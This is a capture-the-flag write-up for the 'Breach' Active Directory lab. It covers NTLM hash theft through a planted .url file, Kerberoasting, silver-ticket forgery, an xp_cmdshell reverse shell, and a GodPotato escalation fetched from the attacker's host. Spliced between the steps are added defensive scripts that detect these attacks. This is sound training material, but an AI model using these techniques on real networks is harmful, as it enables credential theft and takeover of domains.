# Breach

## OVERVIEW

---

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766545042428/b6adff6c-840d-4000-a9be-d4064813b105.png align="center")

We are given the machine IP and told that the user flag is in C:\\share\\transfer. Let’s scan the machine for open ports and services using Nmap.

---

## ENUMERATION

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766545318947/bfb98bd1-aae9-446d-b02a-8660d3a3a93b.png align="left")

As you can see, many ports are open, and we also got the domain name and the domain controller’s hostname, so add this information to **<mark>/etc/hosts</mark>**.

Let’s first check SMB shares:

Since we do not have a username and password yet, we will try a **Guest/Anonymous** login.  
I am using **smbmap**; you can use **netexec** as well.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766545779383/2a02e85f-33a6-4acd-8753-8c727a5b51df.png align="center")

We found 3 **shares**: we have **Read** access to two of them and **READ,WRITE** access to one.

Let’s check out the share using **smbclient**.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766546435706/fab03cfe-b3a5-43d2-9e2c-5f55409db79c.png align="center")

On accessing the share we found three directories, two of which are empty; inside the **transfer** directory there are 3 more user directories, and listing their contents is denied.

**Since we have Read and Write access on the share, we can steal NTLM creds by uploading a crafted file to the share using smbclient.**

---

## GETTING NTLM HASH

For this I am using the [**ntlm\_theft**](https://github.com/Greenwolf/ntlm_theft.git) tool to generate the files.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766547149982/9ef6671b-ec3e-4371-bc99-4d0c222d7d5f.png align="center")

We will use the icon file: move it to the directory you will run smbclient from, and rename it to **shell.url** for readability.

First, start Responder in another terminal using:

```bash
sudo responder -I tun0 -wdv
```

Now log in with smbclient again, go to the transfer directory, `put` shell.url inside it, and wait about 2 minutes: you will get the NTLM hash of the **Julia.Wong** user.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766548227048/100b01f3-66a3-41f8-b0b5-1995fa2dae66.png align="center")

Now save the hash in hash.txt and use John the Ripper with the rockyou.txt wordlist to crack it and get the password.
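The trick above works because Windows Explorer renders the icon of a `.url` (Internet Shortcut) file as soon as a user opens the folder, and if `IconFile` points at a UNC path the client authenticates to that host with NTLM before the user clicks anything. From the defender’s side, a writable share that other users browse is therefore worth auditing for such files. The scanner below is an added example (not part of this write-up or the ntlm\_theft project): it walks a directory tree, parses `.url` files with Python’s INI parser and flags any whose `IconFile`, `URL` or `WorkingDirectory` points to a UNC path or a `file://`/`smb://` host, and it flags other shortcut types (`.lnk`, `.scf`, `.library-ms`, `.searchconnector-ms`) by extension alone. The sample tree it builds in a temporary directory is constructed for the demonstration; `192.0.2.10` is a documentation address, not a real host.

```python
import configparser
import os
import re
import tempfile
from pathlib import Path

# Shortcut-like files that Explorer processes as soon as a folder is listed.
# .url is parsed for remote icon paths; the others are flagged by extension alone.
PARSED_EXTENSIONS = {".url"}
FLAG_BY_EXTENSION = {".lnk", ".scf", ".library-ms", ".searchconnector-ms"}

UNC_PATH = re.compile(r"^\\\\[^\\]+\\")            # \\host\share\...
REMOTE_SCHEME = re.compile(r"^(file|smb)://", re.IGNORECASE)


def remote_references(path: Path) -> list:
    """Return (key, value) pairs in a .url file that point at a remote host."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        parser.read(path, encoding="utf-8-sig")
    except configparser.Error:
        return [("parse-error", "")]          # a malformed shortcut is worth a look too
    found = []
    if parser.has_section("InternetShortcut"):
        for key in ("IconFile", "URL", "WorkingDirectory"):
            value = parser.get("InternetShortcut", key, fallback="")
            if UNC_PATH.match(value) or REMOTE_SCHEME.match(value):
                found.append((key, value))
    return found


def scan_share(root: str) -> list:
    """Walk a share tree and report files that would make a browsing client authenticate outward."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath, name)
            ext = p.suffix.lower()
            if ext in PARSED_EXTENSIONS:
                for key, value in remote_references(p):
                    hits.append({"file": str(p), "reason": f"{key} -> {value}"})
            elif ext in FLAG_BY_EXTENSION:
                hits.append({"file": str(p), "reason": f"{ext} shortcut on a writable share"})
    return hits


def flagged_names(root: str) -> list:
    """Sorted basenames of flagged files (convenience for reporting)."""
    return sorted(Path(h["file"]).name for h in scan_share(root))


def build_sample_share() -> str:
    """Create a constructed sample tree: a benign .url, a remote-icon .url, a .scf and a text file."""
    root = tempfile.mkdtemp(prefix="share-")
    transfer = Path(root, "transfer")
    transfer.mkdir()
    # Benign: web URL with an icon taken from a local system DLL.
    Path(transfer, "intranet.url").write_text(
        "[InternetShortcut]\nURL=https://intranet.example.local/\n"
        "IconFile=C:\\Windows\\System32\\SHELL32.dll\nIconIndex=13\n")
    # Icon hosted on another machine (192.0.2.10 is a documentation address, constructed here).
    Path(transfer, "shell.url").write_text(
        "[InternetShortcut]\nURL=https://intranet.example.local/\n"
        "IconFile=\\\\192.0.2.10\\share\\icon.ico\nIconIndex=1\n")
    Path(transfer, "desktop.scf").write_text("[Shell]\nCommand=2\n")
    Path(transfer, "notes.txt").write_text("plain file, ignored\n")
    return root


if __name__ == "__main__":
    for hit in scan_share(build_sample_share()):
        print(f"{hit['file']}: {hit['reason']}")
```

Run it against the mounted share root instead of the sample tree to audit a real environment. The broader fixes are the ones this box lacks: do not grant Everyone write access to a share that other users browse, and block outbound SMB (TCP 445) at the perimeter so that a planted shortcut cannot reach a listener outside the network in the first place.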

Now check whether it is valid using netexec:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766548540833/97478b07-f9ba-454b-92e0-9dc7958ff737.png align="center")

It is valid.

---

## USER FLAG

**Now you can get your user.txt from C:\\share\\transfer using smbclient, logged in as Julia.Wong.**

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766552468445/635846fe-a0e9-4232-b715-b8e0c7bbac4b.png align="center")

---

## EXPLOITATION

Now that we have a valid user password, we can run **Bloodhound** to visualize the relationships between users, OUs, groups, etc.

```bash
bloodhound-python -u 'julia.wong' -p 'JULIA-PASS' -d breach.vl -ns 10.129.13.42 -c ALL --zip
```

While enumerating in Bloodhound we find that there is one other Kerberoastable account besides krbtgt: **svc\_mssql**.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766549302870/a83a9f77-8335-4681-9896-5177cd88386f.png align="center")

Looking at the node info of svc\_mssql we find that its Admin Count = False, which means we can create a ticket for it to impersonate a high-privileged user, but first let’s find its password.

Since it is a Kerberoastable account, we can use [**NetExec**](https://github.com/Pennyw0rth/NetExec) to get its hash and then crack it, **OR** you can use Impacket’s GetUserSPNs.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766550192693/780b9aae-4f5c-44c7-b738-11b082b55d33.png align="center")

Crack the hash using John the Ripper to get the password for **svc\_mssql**, then verify it:
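Kerberoasting leaves a trace on the domain controller: every service-ticket request is logged as Event ID 4769, and a request with Ticket Encryption Type 0x17 (RC4-HMAC) for a service account, or one requester asking for tickets to many different service accounts in a short window, is the usual indicator. The detection below is an added example (not from this write-up, NetExec or Impacket): it takes a handful of constructed 4769 records built with the Windows field names, ignores krbtgt and computer accounts, skips failed requests, and reports both RC4 requests and sweeps. The threshold and window are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_TYPES = {"0x17", "0x18"}          # RC4-HMAC and RC4-HMAC-EXP: crackable offline
BURST_THRESHOLD = 5                   # assumed: distinct service accounts per requester...
BURST_WINDOW = timedelta(minutes=5)   # ...within this window


def ev(time, user, service, etype, ip="10.0.0.50", status="0x0"):
    """Build one constructed Event 4769 record with the Windows field names."""
    return {"time": time, "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "IpAddress": ip, "Status": status}


# Constructed sample: one RC4 request for a service account, a krbtgt renewal, a
# computer-account ticket, normal AES traffic, a failed request, and one requester
# sweeping five service accounts within a few seconds.
SAMPLE_EVENTS = [
    ev("2025-01-10T09:00:01", "julia.wong@BREACH.VL", "svc_mssql", "0x17"),
    ev("2025-01-10T09:00:01", "julia.wong@BREACH.VL", "krbtgt", "0x17"),
    ev("2025-01-10T09:00:05", "julia.wong@BREACH.VL", "WS01$", "0x12"),
    ev("2025-01-10T09:02:00", "bob@BREACH.VL", "svc_web", "0x12", ip="10.0.0.51"),
    ev("2025-01-10T09:03:00", "bob@BREACH.VL", "svc_backup", "0x12", ip="10.0.0.51", status="0xe"),
] + [
    ev(f"2025-01-10T09:10:{s:02d}", "ann.lee@BREACH.VL", f"svc_app{s}", "0x12", ip="10.0.0.60")
    for s in range(5)
]


def is_service_account(service_name: str) -> bool:
    """Ignore krbtgt (TGT renewals) and computer accounts (name$); only real service accounts matter."""
    base = service_name.split("/")[0].lower()
    return base != "krbtgt" and not base.endswith("$")


def detect_kerberoast(events) -> list:
    """Return alerts for RC4 service tickets and for requesters sweeping many service accounts."""
    alerts = []
    requests = defaultdict(list)             # requester -> [(time, service account)]
    for e in events:
        if e.get("Status", "0x0") != "0x0":
            continue                         # a failed request yields no ticket to crack
        if not is_service_account(e["ServiceName"]):
            continue
        if e["TicketEncryptionType"].lower() in RC4_TYPES:
            alerts.append({"type": "rc4-service-ticket", "user": e["TargetUserName"],
                           "service": e["ServiceName"], "source": e["IpAddress"]})
        requests[e["TargetUserName"]].append((datetime.fromisoformat(e["time"]), e["ServiceName"]))
    for user, reqs in requests.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            services = {svc for t, svc in reqs[i:] if t - start <= BURST_WINDOW}
            if len(services) >= BURST_THRESHOLD:
                alerts.append({"type": "service-sweep", "user": user,
                               "count": len(services), "services": sorted(services)})
                break                        # one alert per requester is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_kerberoast(SAMPLE_EVENTS):
        print(alert)
```

The mitigation is what would have stopped this step on the box: a service account whose password is in rockyou.txt is Kerberoastable by anyone with a domain login, so give service accounts long random passwords or use a group Managed Service Account, and set `msDS-SupportedEncryptionTypes` to AES only so that an RC4 request stands out (or fails outright).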

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766550694970/3a628f18-3e37-41aa-8b9a-302986104783.png align="center")

Now that we have the password for svc\_mssql, let’s move on to impersonating a high-privileged user using Impacket’s ticketer.py:

```bash
ticketer.py -user svc_mssql -nthash NT-HASH -domain breach.vl -domain-sid DOMAIN-SID -spn SPN administrator
```

Replace NT-HASH with the NT hash of the svc\_mssql password, which you can get by converting the password using this website:  
[https://hashes.com/en/generate/hash](https://hashes.com/en/generate/hash)

Replace DOMAIN-SID and SPN with the values from the Bloodhound svc\_mssql node info.
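The NT hash is just MD4 over the UTF-16LE encoding of the password, so there is no need to paste a recovered credential into a third-party website: the site operator learns the password, and the lookup leaves a record outside your engagement. The function below is an added example (not part of this write-up or of Impacket). It carries its own MD4, because `hashlib` no longer exposes MD4 on OpenSSL 3 builds, and it shows the defender-side use of the same primitive: checking a password against an offline list of known-compromised NT hashes. The `KNOWN_COMPROMISED` set is a constructed stand-in for such a list.

```python
import struct

MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def _f(x, y, z):
    return (x & y) | (~x & z)


def _g(x, y, z):
    return (x & y) | (x & z) | (y & z)


def _h(x, y, z):
    return x ^ y ^ z


# Per round: boolean function, message-word order, per-step shifts, additive constant (RFC 1320).
_ROUNDS = (
    (_f, list(range(16)), (3, 7, 11, 19), 0x00000000),
    (_g, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
    (_h, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
)


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320. Pure Python: fine for a handful of values, not for bulk hashing."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64)           # pad to 56 bytes mod 64 ...
    msg += struct.pack("<Q", len(data) * 8)           # ... then the 64-bit little-endian bit length
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        s = list(state)
        for fn, order, shifts, k in _ROUNDS:
            for i, word in enumerate(order):
                t = (-i) % 4                           # A, D, C, B are updated in turn
                a, b, c, d = (s[(t + j) % 4] for j in range(4))
                s[t] = _rotl((a + fn(b, c, d) + x[word] + k) & MASK, shifts[i % 4])
        state = [(v + n) & MASK for v, n in zip(state, s)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), as the hex string ticketer.py's -nthash takes."""
    return md4(password.encode("utf-16-le")).hex()


# Constructed stand-in for an offline list of leaked NT hashes (this one is the hash of "password").
KNOWN_COMPROMISED = {"8846f7eaee8fb117ad06bdd830b7586c"}


def is_known_compromised(password: str) -> bool:
    """Defender-side use of the same primitive: is this password's NT hash on the leaked list?"""
    return nt_hash(password) in KNOWN_COMPROMISED


if __name__ == "__main__":
    import getpass
    pw = getpass.getpass("password (not echoed): ")
    print(nt_hash(pw), "known-compromised" if is_known_compromised(pw) else "")
```

Reading the password with `getpass` keeps it out of shell history and process listings, which is the other thing the website approach gets wrong.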

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766551608109/f66cb687-593c-4e2d-b4be-6a2f8a42358f.png align="left")

```bash
export KRB5CCNAME=administrator.ccache
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766552114805/a5a5e88a-ea6c-4a98-9fbe-c079f7f4d066.png align="center")
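A ticket forged with ticketer.py never touches the KDC: the domain controller logs no service-ticket request (Event 4769) for it, yet the SQL host still records a Kerberos network logon (Event 4624, logon type 3, authentication package Kerberos) for the impersonated account. Correlating the two logs is the classic way to catch it. The code below is an added example (not part of this write-up or of Impacket) working over constructed records: for every Kerberos 4624 on a mapped member server it looks for a 4769 issued to the same account for that server’s service account within a time window, and flags logons that have none. Field names follow the Windows event schema; the window and the host-to-service-account mapping are assumptions.

```python
from datetime import datetime, timedelta

# Assumed: a service ticket is normally used within this long of being issued. The default
# TGS lifetime is 10 hours, so tune this to how your clients actually behave.
WINDOW = timedelta(minutes=10)

# Assumed mapping: which service account's key protects tickets for each member server.
HOST_SERVICE_ACCOUNT = {"MSSQL01": "svc_mssql"}


def ts(value: str) -> datetime:
    return datetime.fromisoformat(value)


# Constructed DC records (Event 4769, successful service-ticket requests).
DC_4769 = [
    {"time": "2025-01-10T10:00:00", "TargetUserName": "julia.wong@BREACH.VL", "ServiceName": "svc_mssql"},
    {"time": "2025-01-10T10:05:00", "TargetUserName": "bob@BREACH.VL", "ServiceName": "svc_mssql"},
]

# Constructed member-server records (Event 4624 on the SQL host).
HOST_4624 = [
    {"time": "2025-01-10T10:00:02", "Computer": "MSSQL01", "TargetUserName": "julia.wong",
     "LogonType": "3", "AuthenticationPackageName": "Kerberos"},
    {"time": "2025-01-10T10:05:01", "Computer": "MSSQL01", "TargetUserName": "bob",
     "LogonType": "3", "AuthenticationPackageName": "Kerberos"},
    # Kerberos logon as administrator that no DC ever issued a ticket for: what a forged ticket looks like.
    {"time": "2025-01-10T10:20:00", "Computer": "MSSQL01", "TargetUserName": "administrator",
     "LogonType": "3", "AuthenticationPackageName": "Kerberos"},
    # NTLM logon: out of scope for this check, no ticket is involved.
    {"time": "2025-01-10T10:21:00", "Computer": "MSSQL01", "TargetUserName": "administrator",
     "LogonType": "3", "AuthenticationPackageName": "NTLM"},
]


def unbacked_kerberos_logons(tgs_events, logon_events, window=WINDOW) -> list:
    """Kerberos network logons on a mapped host that no DC service-ticket request accounts for."""
    issued = [(ts(e["time"]), e["TargetUserName"].split("@")[0].lower(), e["ServiceName"].lower())
              for e in tgs_events]
    suspicious = []
    for lg in logon_events:
        if lg["LogonType"] != "3" or lg["AuthenticationPackageName"] != "Kerberos":
            continue
        service = HOST_SERVICE_ACCOUNT.get(lg["Computer"])
        if service is None:
            continue                                  # host not covered by the mapping
        when, user = ts(lg["time"]), lg["TargetUserName"].lower()
        backed = any(u == user and s == service and timedelta(0) <= when - t <= window
                     for t, u, s in issued)
        if not backed:
            suspicious.append({"host": lg["Computer"], "user": user, "time": lg["time"],
                               "reason": "Kerberos logon without a matching 4769 on the DC"})
    return suspicious


if __name__ == "__main__":
    for finding in unbacked_kerberos_logons(DC_4769, HOST_4624):
        print(finding)
```

Two caveats when running this for real: collect 4769 from every domain controller, otherwise a ticket issued by a different DC shows up as a false positive, and expect cached tickets reused after the window to do the same. Rotating the svc\_mssql password twice invalidates any ticket forged with the old key, which is the containment step once a silver ticket is suspected.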

**Now we can enable xp\_cmdshell and use it to run a reverse shell, getting a shell as breach\\svc\_mssql.**

```sql
enable_xp_cmdshell

xp_cmdshell powershell-base64-rev-shell-payload
```

Use a reverse shell payload from [https://www.revshells.com/](https://www.revshells.com/) and start your listener.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766553309893/f9609f7a-2f72-4509-be53-4d3ee76727f4.png align="left")

---

## PRIVILEGE ESCALATION / ROOT FLAG

Let’s see what privileges the user has:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766553608010/30bf0f12-e7ea-4a12-bb76-17ffc019f5c6.png align="center")

As you can see, we have **SeImpersonatePrivilege Enabled**,  
so we can use [**GodPotato**](https://github.com/BeichenDream/GodPotato/releases) (or [**SweetPotato**](https://github.com/CCob/SweetPotato)).

Serve the binary with a Python HTTP server:

```bash
python3 -m http.server 8000
```

Now download it into the shell using iwr (Invoke-WebRequest), from within **C:\\Users\\svc\_mssql\\Documents**:

```powershell
iwr http://YOUR-IP:PORT/GodPotato-NET4.exe -OutFile GodPotato-NET4.exe
```

Now run:

```powershell
.\GodPotato-NET4.exe -cmd 'powershell-revshell-base64-cmd'   # be sure to change the port
```

Now check your listener: you will get a shell as NT AUTHORITY\\SYSTEM, and then you can get the root flag.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766556257327/8ab5a14c-d5c6-4121-9393-b1476fdb9862.png align="left")

## **WE FINALLY DID IT !!!! CHALLENGE SOLVED !!**

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766556425422/13071950-ab24-4d07-9a9e-662b2c9e661d.png align="center")

For any query or problem, either leave a comment or contact me at [**reapsec.com**](http://reapsec.com/).

**THANKS FOR READING !!!**
